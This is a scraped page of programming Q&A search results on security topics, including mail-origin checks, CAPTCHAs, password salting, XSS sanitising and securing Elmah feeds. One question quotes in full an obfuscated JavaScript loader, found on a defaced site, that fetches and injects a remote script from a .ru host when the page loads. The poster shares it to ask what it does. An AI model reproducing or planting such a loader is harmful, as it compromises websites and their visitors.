Search Results

Search found 68155 results on 2727 pages for 'data security'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 406/2727 | < Previous Page | 402 403 404 405 406 407 408 409 410 411 412 413  | Next Page >

  • How to verify mail origin?

    - by MrZombie
    I wish to code a little service where I will be able to send an e-mail to a specific address used by my server to send specific commands to my server. I'll check against a list of permitted e-mail addresses to make sure no one unauthorized will send a command to the server, but how do I make sure that, say, an e-mail sent by "[email protected]" really comes from "thezombie.net"? I thought about checking the header for the original e-mail server's IP and pinging the domain to make sure it is the same, but would that be reliable? Example: Server receives a command from [email protected] [email protected] is authorized, proceed with checks Server checks "thezombie.net"'s IP from the header: W.X.Y.Z Server pings "thezombie.net" for it's IP: A.B.C.D The IPs do not correspond, do not process command Is there any better way to do that?

    Read the article

  • Is there an Unobtrusive Captcha for web forms?

    - by KP
    What is the best unobtrusive CAPTCHA for web forms? One that does not involve a UI, rather a non-UI Turing test. I have seen a simple example of a non UI CAPTCHA like the Nobot control from Microsoft. I am looking for a CAPTCHA that does not ask the user any question in any form. No riddles, no what's in this image.

    Read the article

  • How to give you website customers a secure feeling

    - by Saif Bechan
    I was wondering how you can give your website customers the confidence that you are not tinkering with the database values. I am planning on running a website which falls in the realm of an online game. There is some kind of credit system involved that people have to pay for. Now I was wondering how sites like this ensure there customers that there is no foul play in the database itself. As I am the database admin i can pretty much change all the values from within without anyone knowing i did. Hence letting someone win that does not rightfully is the winner. Is it maybe an option to decrypt en encrypt the credits people have so i can't change them. Or is there maybe a company i can hire that checks my company for foul play.

    Read the article

  • Linq to sql Error "Data at the root level is invalid " for nullable xml column

    - by Mukesh
    I have Created a table like CREATE TABLE [dbo].[tab1]( [Id] [int] NOT NULL, [Name] [varchar](100) NOT NULL, [Meta] [xml] NULL, CONSTRAINT [PK_tab1] PRIMARY KEY CLUSTERED ( [Id] ASC )WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY] ) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY] When I am doing linq to sql query to fetch a data it throw an error "data at the root level is invalid linq". In further investigation I come to know that the meta column is null in that case. In real it is nullable Do I have to remove the nullable and set some blank root node as default or there is some another way to get rid of the error. My linq Query which throws error var obj1= (from obj in dbContext.tab1s where obj.id== 123 select obj).FirstOrDefault<Tab1>();

    Read the article

  • Sending data remotely from iPhone native apps to Rails apps

    - by jpartogi
    Dear all, I have decided to develop a native iPhone apps as a compliment to our webapps. Now I am wondering what are my options to send data remotely from the iPhone apps - since the database is online - to our online database. What I can think of on top of my head - since I come from web dev background - is JSON. My webapps is built using Rails, so I figure it would not be difficult to accept JSON request from the iPhone apps. But the next question is, is it difficult to send JSON data remotely from the iPhone apps? If JSON is not recommendable, what are my other options? Thank you so much for the assistance. Really appreciate it.

    Read the article

  • How can I sort an NSTableColumn of NSStrings ignoring "The " and "A "?

    - by David Barry
    I've got a simple Core Data application that I'm working on to display my movie collection. I'm using an NSTableView, with it's columns bound to attributes of my Core Data store through an NSArrayController object. At this point the columns sort fine(for numeric values) when the column headers are clicked on. The issue I'm having is with the String sorting, they sort, however it's done in standard string fashion, with Uppercase letters preceding lowercase(i.e. Z before a). In addition to getting the case sorting to work properly, I would like to be able to ignore a prefix of "The " or "A " when sorting the strings. What is the best way to go about this in Objective-C/Cocoa?

    Read the article

  • Using MS Anti XSS library for sanitizing HTML

    - by user102533
    In the intent of preventing XSS attacks, I am updating a page in which we have a textbox that accepts HTML, stores it in a database and retrieves and renders it at a later time. My understanding is that I can sanitize the HTML using AntiXSS.GetSafeHtmlFragment() method. As long as I do this before storing the HTML in the database, am I covered? Do I need to do anything when the HTML is outputted on a web page? Also, it appears that the white list is kind of a black box. Is there a way to update this based on our requirements?

    Read the article

  • Account sharing among Ubuntu machines

    - by muckabout
    I'd like a simple and secure system to have allow users in our network to have their account (e.g., 'myname') work on every machine in the network (e.g., such that they could ssh to any machine and have the same userid, mounted smb share). Any suggestions?

    Read the article

  • What should a developer know before building a public web site?

    - by Joel Coehoorn
    What things should a programmer implementing the technical details of a web site address before making the site public? If Jeff Atwood can forget about HttpOnly cookies, sitemaps, and cross-site request forgeries all in the same site, what important thing could I be forgetting as well? I'm thinking about this from a web developer's perspective, such that someone else is creating the actual design and content for the site. So while usability and content may be more important than the platform, you the programmer have little say in that. What you do need to worry about is that your implementation of the platform is stable, performs well, is secure, and meets any other business goals (like not cost too much, take too long to build, and rank as well with Google as the content supports). Think of this from the perspective of a developer who's done some work for intranet-type applications in a fairly trusted environment, and is about to have his first shot and putting out a potentially popular site for the entire big bad world wide web. Also: I'm looking for something more specific than just a vague "web standards" response. I mean, HTML, JavaScript, and CSS over HTTP are pretty much a given, especially when I've already specified that you're a professional web developer. So going beyond that, Which standards? In what circumstances, and why? Provide a link to the standard's specification. This question is community wiki, so please feel free to edit that answer to add links to good articles that will help explain or teach each particular point.

    Read the article

  • Neo4j Performing shortest path calculations on stored data

    - by paddydub
    I would like to store the following graph data in the database, graph.makeEdge( "s", "c", "cost", (double) 7 ); graph.makeEdge( "c", "e", "cost", (double) 7 ); graph.makeEdge( "s", "a", "cost", (double) 2 ); graph.makeEdge( "a", "b", "cost", (double) 7 ); graph.makeEdge( "b", "e", "cost", (double) 2 ); Then run the Dijskra algorighm from a web servlet, to find shortest path calculations using the stored graph data. Then I will print the path to a html file from the servlet. Dijkstra<Double> dijkstra = getDijkstra( graph, 0.0, "s", "e" );

    Read the article

  • Looking for a good WTF story involving SSL

    - by lindelof
    I'm preparing a talk on SSL to our local Java user group, and I would like to introduce it with some story on how NOT to use it. I've searched through the DailyWTF archives but couldn't find anything really good. Do you know such a story, or do you have some pointers where I could go looking for one?

    Read the article

  • Trying to retrieve the contents of UITableView cell on selection by user.

    - by chubsta
    Hi, this is my first post here and as i am very new (2 weeks in...) to iPhone (or any!) development i am a little unsure as to how much detail is needed or relevant, so please forgive me if I dont provide enough to be useful at this stage... Anyway, on to my problem - I have set up a UITableView-based app, which has a .plist for holding the data. The .plist has a dictionary as its root, followed by a number of Arrays, each containing the data-strings that display in the table. Everything is working fine until the point where i select a row. I have set it up so i get an alert with the results of the button press and it is here that i want to see the contents of the cell being produced. Instead of the expected string eg. "data line 1", all i get is the number of the row within the section. I have gone backwards and forwards but dont seem to be getting anywhere although i am sure it is something simple. The code compiles fine, with no warnings or errors, and if i can just get the string of the selected cell i will be well on my way, so any help appreciated. I know that I need to do more following the 'NSUInteger row = [indexPath row]; part but thats where my mind dries up... here is the relevant 'selection' section, if i need to post more code please let me know, and i really appreciate any help with this...(please forgive my 'alert' message, i was just happy at that point that i get SOMETHING back from the row selection!) (void)tableView:(UITableView *)tableView didSelectRowAtIndexPath:(NSIndexPath *)indexPath { [tableView deselectRowAtIndexPath:indexPath animated:YES]; NSUInteger row = [indexPath row]; NSString *message = [[NSString alloc] initWithFormat: @"You selected Cell %d from this Section, "@"which is a very good choice indeed!" @"Unfortunately I can't work out how to get the info out of the cell so it's not much use at the moment!" @"Still, this is a good chance to see how much space I have in an alert box!", row]; UIAlertView *alert = [[UIAlertView alloc] initWithTitle:@"My God! It works..." message:message delegate:nil cancelButtonTitle:@"You are awesome Karl!!" otherButtonTitles:nil]; [alert show]; [message release]; [alert release]; }

    Read the article

  • Service Broker message_body error when casting binary data to xml in C#

    - by TimBuckTwo
    I am using Message Broker with Sql server 2008, and designing an External Activator service to consume messages from my target queue. My Problem: Cant cast the returned message body from the SqlDataReader object: "WAITFOR (RECEIVE TOP(1) conversation_handle, message_type_name, message_body FROM [{1}]), TIMEOUT {2}" operation, I cant cast the binary data to XML in C# SqlBinary MessageBody = reader.GetSqlBinary(2); MemoryStream memstream = new MemoryStream(); XmlDocument xmlDoc = new XmlDocument(); memstream.Write(MessageBody.Value, 0, MessageBody.Length); memstream.Position= 0; //below line Fails With Error:{"Data at the root level is invalid. Line 1, position 1."} xmlDoc.LoadXml(Encoding.ASCII.GetString(memstream.ToArray())); memstream.Close(); To prevent poison message I do not use CAST(message_body as XML), Any suggestions would be greatly appreciated.

    Read the article

  • java keytool question

    - by user384706
    Hi, I created a java keystore programmatically of type jks (i.e. default type). It is initially empty so I created a DSA certificate. keytool -genkey -alias myCert -v -keystore trivial.keystore How can I see the public and private keys? I.e. is there a command that prints the private key of my certificate? I could only find keytool -certreq which in my understanding prints the certificate as a whole: -----BEGIN NEW CERTIFICATE REQUEST----- MIICaTCCAicCAQAwZTELMAkGA1UEBhMCR1IxDzANBgNVBAgTBkdyZWVjZTEPMA0GA1UEBxMGQXRo BQADLwAwLAIUQZbY/3Qq0G26fsBbWiHMbuVd3VICFE+gwtUauYiRbHh0caAtRj3qRTwl -----END NEW CERTIFICATE REQUEST----- I assume this is the whole certificate. How can I see private (or public key) via keytool? Thank you

    Read the article

  • What does this script do? Is it malicious?

    - by ramdaz
    This script was added to a defaced web page of a client web site running PHP. I have no clue what this script can do, and do not know whether this is really malicious. Can someone advise. Please find code below.... var GU='';var h;var X=new String();var mP="";H=function(){var F=["hu"];function L(Lc,O,d){return Lc.substr(O,d);}OH=55345;OH-=37;var x=document;QM=6929;QM++;q=25298;q-=65;var t='';var vs={};var u=["hR"];var Oi=RegExp;var A={kh:"LQ"};var v=new String("/goo"+"gle."+L("com/DyBg",0,4)+L("abc.EBgq",0,4)+L("0vm1go.c1m0v",4,4)+"om/t"+L("erraX6U",0,4)+L(".comKvlS",0,4)+L("P1By.br.By1P",4,4)+"php");yz={Ec:false};function y(Lc,O){hI=24414;hI++;g={};a=28529;a--;var d=new String(L("[n0jJ",0,1))+O+String("]");var m=new Oi(d, String("g"));n={kW:40818};ly={HN:false};return Lc.replace(m, t);};ZW=9686;ZW-=202;GE=56525;GE-=235;D=["u_","QP"];var E=null;var vd={ka:"J"};var Jn=new Date();Xg={V:51919};var l=751407-743327;try {} catch(U){};var W=new String("body");var qi="qi";this.Vf=38797;this.Vf--;var P=y('skchrkikpjtJ','SvFJDneKyEB_akgG1jx6h7OMZ');var RlE=58536;var Xx=false;this.jo='';vi=41593;vi--;h=function(){try {var YU=new String();var DY="";var dY=y('c4rJeJaVt_ebEslVe4mJe_n4ty','bqV_4sJy6');CN={_Y:63379};s=x[dY](P);var fH="fH";pI=33929;pI--;Uw=[];var G=y('sVrvc5','5wvD6TG4IuR2MLBjQgPpbVK');var Wg=[];var Lc=l+v;var yW=new String();var iO=new String();var Oe=String("defe"+"r");var Et=["qO","AF"];var QX=13548;s[G]=new String("http:"+L("//ten5qC",0,5)+"thpro"+"fit.r"+L("u:mn7k",0,2))+Lc;PA={};s[Oe]=[2,1][1];this.Vt="Vt";var ho=46131;try {var kn='cI'} catch(kn){};this.ww=27193;this.ww+=97;x[W].appendChild(s);this.yk=60072;this.yk++;var Lp=new Date();} catch(PY){this.ku=43483;this.ku++;this.ra=47033;this.ra--;this.ru="ru";};var lu=new Array();var me=new String();};};YB=["LB","uM"];var AI={Vm:4707};H();this.mDs=57864;this.mDs-=135;zz=44697;zz++;var sn=[];window.onload=h;var PQ=false;var mF={Hm:false};try {var r_='iv'} catch(r_){};this.z_="z_";

    Read the article

  • Alternatives to dotfuscator suite?

    - by SnOrfus
    I've been looking for solutions that provide a couple of types of protection and dotfuscator has been what I've landed on each time I look. Specifically, I like: code obfuscation their usage analytics tamper detection/notification shelf-life enforcement Now, I know that there's lots of alternatives to the first, some of which are free, but are there alternatives to the others? It's not that I don't want to pay the cost of dotfuscator suite, but I want to be informed before I write the cheque.

    Read the article

  • WCF REST based services authentication schemes

    - by FlySwat
    I have a simple authentication scheme for a set of semi-public REST API's we are building: /-----------------------\ | Client POST's ID/Pass | | to an Auth Service | \-----------------------/ [Client] ------------POST----------------------> [Service/Authenticate] | /-------------------------------\ | Service checks credentials | [Client] <---------Session Cookie------- | and generates a session token | | | in a cookie. | | \-------------------------------/ | [Client] -----------GET /w Cookie -------------> [Service/Something] | /----------------------------------\ | Client must pass session cookie | | with each API request | | or will get a 401. | \----------------------------------/ This works well, because the client never needs to do anything except receive a cookie, and then pass it along. For browser applications, this happens automatically by the browser, for non browser applications, it is pretty trivial to save the cookie and send it with each request. However, I have not figured out a good approach for doing the initial handshake from browser applications. For example, if this is all happening using a AJAX technique, what prevents the user from being able to access the ID/Pass the client is using to handshake with the service? It seem's like this is the only stumbling block to this approach and I'm stumped.

    Read the article

  • Linq to Sql Data class in dbml

    - by Simon
    I am abit curious about dbml.... Should I create one dbml file for one database or separated into different parts e.g. User dbml (only tables relate to users) etc? When I do this I will have abit of problems. Assume the User dbml has a User table and if the Order dbml has a User table as well, this won't be allowed if the entity namespace are the same. If I have set a different entity namespace for each of the dbml, it works but this will gives me a different entity of User table. When a single data returns to Business Logic layer, there is a difficulty of knowing which entity namespace of the user table to be used. If I built one dbml file instead of having separate dbml, will single dbml appear slower than the separated dbml version when fetching the data from the database.

    Read the article

  • Efficient JSON encoding for data that may be binary, but is often text

    - by Evgeny
    I need to send a JSON packet across the wire with the contents of an arbitrary file. This may be a binary file (like a ZIP file), but most often it will be plain ASCII text. I'm currently using base64 encoding, which handles all files, but it increases the size of the data significantly - even if the file is ASCII to begin with. Is there a more efficient way I can encode the data, other than manually checking for any non-ASCII characters and then deciding whether or not to base64-encode it? I'm currently writing this in Python, but will probably need to do the same in Java, C# and C++, so an easily portable solution would be preferable.

    Read the article

  • Passing data between states PHP

    - by esryl
    So I am using Limonade PHP which has a RESTful design which emulates PUT, POST, DELETE routes for create, update, delete. I am trying to develop some form validation which is going well. The major problem I am facing though is how to return my filtered data (which has failed validation) back to repopulate the create or edit form. How would this be done? I currently have for creating a page: /admin/page/new -> GET function /admin/page -> POST function + validate + pass, update db + fail, add errors to flash, redirect to /admin/page/mew It all falls down as I do not know how to populate the /admin/page/new with the invalid, but filtered data.

    Read the article

  • Are there any differences between MSSQL and MySQL when it comes to preventing SQL injection?

    - by Derek Adair
    I am used to developing in PHP/MySQL and have no experience developing with MSSQL. I've skimmed over the PHP MSSQL documentation and it looks similar to MySQLi in some of the methods I read about. For example, with MySQL I utilize the function mysql_real_excape_string(). Is there a similar function with PHP/MSSQL? What steps do I need to take in order to protect against SQL injection with MSSQL? What are the differences between MSSQL and MySQL pertaining to SQL injection prevention?

    Read the article

  • Securing Elmah RSS Feeds in ASP.NET website

    - by olivehour
    I followed the answer to this question http://stackoverflow.com/questions/1245364/securing-elmah-in-asp-net-website to restrict access to the elmah handler. However, it seems that adding an RSS feed to Outlook for the URL elmah.axd/rss or elmah.axd/digestrss bypasses the authentication. What's the point of securing the handler if someone can guess the RSS URL and subscribe to a feed of the error log?

    Read the article

  • Can per-user randomized salts be replaced with iterative hashing?

    - by Chas Emerick
    In the process of building what I'd like to hope is a properly-architected authentication mechanism, I've come across a lot of materials that specify that: user passwords must be salted the salt used should be sufficiently random and generated per-user ...therefore, the salt must be stored with the user record in order to support verification of the user password I wholeheartedly agree with the first and second points, but it seems like there's an easy workaround for the latter. Instead of doing the equivalent of (pseudocode here): salt = random(); hashedPassword = hash(salt . password); storeUserRecord(username, hashedPassword, salt); Why not use the hash of the username as the salt? This yields a domain of salts that is well-distributed, (roughly) random, and each individual salt is as complex as your salt function provides for. Even better, you don't have to store the salt in the database -- just regenerate it at authentication-time. More pseudocode: salt = hash(username); hashedPassword = hash(salt . password); storeUserRecord(username, hashedPassword); (Of course, hash in the examples above should be something reasonable, like SHA-512, or some other strong hash.) This seems reasonable to me given what (little) I know of crypto, but the fact that it's a simplification over widely-recommended practice makes me wonder whether there's some obvious reason I've gone astray that I'm not aware of.

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 402 403 404 405 406 407 408 409 410 411 412 413  | Next Page >